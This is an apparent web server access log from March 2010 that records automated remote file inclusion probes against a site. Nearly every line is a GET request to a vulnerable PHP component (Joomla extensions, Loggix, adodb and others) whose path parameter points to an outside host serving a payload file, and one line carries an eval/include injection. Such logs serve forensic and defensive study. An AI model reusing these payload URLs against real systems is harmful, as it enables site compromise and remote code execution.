200.93.147.154 - - [07/Mar/2010:09:54:30 -0800] "GET /modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.39.140.100 - - [07/Mar/2010:09:54:31 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.39.140.100 - - [07/Mar/2010:09:54:31 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:54:33 -0800] "GET /logs/access_100218.log%20%20//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:54:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:54:34 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:54:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:54:35 -0800] "GET /logs/access_100227.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:37 -0800] "GET /logs/access_100211.log%20%20//include/prodler.class.php?sPath=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:54:39 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:54:46 -0800] "GET /include/prodler.class.php?sPath=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:54:59 -0800] "GET /logs/access_100225.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.39.140.100 - - [07/Mar/2010:09:55:02 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.39.140.100 - - [07/Mar/2010:09:55:02 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.39.140.100 - - [07/Mar/2010:09:55:02 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.186.15 - - [07/Mar/2010:09:55:10 -0800] "GET /logs//main.html/connect.lib.php?g4[path]=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.186.15 - - [07/Mar/2010:09:55:11 -0800] "GET /logs/access_100227.log%20%20//main.html/connect.lib.php?g4[path]=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.186.15 - - [07/Mar/2010:09:55:11 -0800] "GET /main.html/connect.lib.php?g4[path]=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [07/Mar/2010:09:55:11 -0800] "GET /myevent.php?myevent_path=http://refurbishedpets.com/store/templates/rt_colormatic/css/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [07/Mar/2010:09:55:11 -0800] "GET /logs/access_100129.log%20%20/myevent.php?myevent_path=http://refurbishedpets.com/store/templates/rt_colormatic/css/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [07/Mar/2010:09:55:11 -0800] "GET /logs/myevent.php?myevent_path=http://refurbishedpets.com/store/templates/rt_colormatic/css/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:55:11 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:55:11 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:55:11 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [07/Mar/2010:09:55:12 -0800] "GET /logs/access_100219.log//editor/editor.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [07/Mar/2010:09:55:13 -0800] "GET /logs/access_100213.log%20%20/myevent.php?myevent_path=http://refurbishedpets.com/store/templates/rt_colormatic/css/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.39.140.100 - - [07/Mar/2010:09:55:23 -0800] "GET /logs/access_100225.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.39.140.100 - - [07/Mar/2010:09:55:34 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:55:50 -0800] "GET /modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:55:50 -0800] "GET /logs//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [07/Mar/2010:09:55:59 -0800] "GET /components/com_phpshop/phpshop_parser.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [07/Mar/2010:09:55:59 -0800] "GET /logs/access_100217.log%20%20//components/com_phpshop/phpshop_parser.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [07/Mar/2010:09:56:00 -0800] "GET /logs//components/com_phpshop/phpshop_parser.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:56:04 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:56:20 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:56:24 -0800] "GET /logs/access_100201.log%20%20///?_SERVER[DOCUMENT_ROOT=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:56:46 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:56:46 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [07/Mar/2010:09:56:51 -0800] "GET /logs/access_100212.log%20%20//components/com_phpshop/phpshop_parser.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:56:55 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:56:55 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:56:55 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:57:05 -0800] "GET /logs/access_100221.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:57:05 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:57:15 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:57:16 -0800] "GET //bbs/delete_all.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:57:16 -0800] "GET /logs///bbs/delete_all.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:57:16 -0800] "GET /logs/access_100225.log///bbs/delete_all.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:09:57:29 -0800] "GET /logs/access_100130.log//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:09:57:48 -0800] "GET /logs/access_100225.log//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:58:07 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:58:13 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:58:13 -0800] "GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:58:17 -0800] "GET /logs//lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:58:45 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:58:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:58:46 -0800] "GET /logs/access_100227.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:58:50 -0800] "GET /logs/access_100213.log//lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:58:57 -0800] "GET /logs/access_100227.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:58:58 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:59:05 -0800] "GET /logs/access_100213.log//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:59:09 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:59:25 -0800] "GET /logs/access_100218.log//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:59:31 -0800] "GET /logs/access_100213.log//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:59:39 -0800] "GET /logs/access_100213.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:59:46 -0800] "GET /logs/access_100213.log//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:59:57 -0800] "GET //bbs/delete_all.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:59:57 -0800] "GET /logs///bbs/delete_all.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:59:58 -0800] "GET /logs/access_100225.log%20%20///bbs/delete_all.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:00:00 -0800] "GET /logs/access.log/?sourcedir=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:00:01 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:00:22 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:00:22 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:00:22 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:00:22 -0800] "GET /logs/access_100218.log%20%20//include/prodler.class.php?sPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:00:23 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:00:23 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:00:23 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:10:00:36 -0800] "GET /logs/access_100207.log//include/prodler.class.php?sPath=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:00:39 -0800] "GET /logs/access_100129.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:00:42 -0800] "GET /logs/access_100129.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:10:00:45 -0800] "GET /logs/access_100202.log%20%20///bbs/delete_all.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:10:00:53 -0800] "GET /logs/access_100218.log//include/prodler.class.php?sPath=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:01:02 -0800] "GET /logs/access_100218.log%20%20//include/prodler.class.php?sPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [07/Mar/2010:10:01:18 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://selamed.110mb.com/1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [07/Mar/2010:10:01:18 -0800] "GET /logs/access_100207.log///?_SERVER[DOCUMENT_ROOT]=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [07/Mar/2010:10:01:19 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://selamed.110mb.com/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
205.234.186.15 - - [07/Mar/2010:10:01:30 -0800] "GET /logs/access_100227.log//main.html/connect.lib.php?g4[path]=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:01:53 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:01:58 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:01:58 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:01:58 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:02:03 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:02:03 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:02:03 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:02:41 -0800] "GET /logs/access_100129.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:02:55 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:03:00 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:03:13 -0800] "GET /logs/access_100213.log%20%20//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:04:09 -0800] "GET /logs/access_100218.log%20%20//include/prodler.class.php?sPath=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:04:56 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:04:57 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:05:34 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:05:44 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:06:00 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [07/Mar/2010:10:06:17 -0800] "GET /logs/access_100217.log//components/com_phpshop/phpshop_parser.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [07/Mar/2010:10:06:34 -0800] "GET /logs/access_100212.log//components/com_phpshop/phpshop_parser.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:06:38 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:06:59 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [07/Mar/2010:10:07:03 -0800] "GET /logs/access_100217.log%20%20/myevent.php?myevent_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [07/Mar/2010:10:07:03 -0800] "GET /myevent.php?myevent_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [07/Mar/2010:10:07:03 -0800] "GET /logs/myevent.php?myevent_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:07:09 -0800] "GET /logs/access_100218.log//include/prodler.class.php?sPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
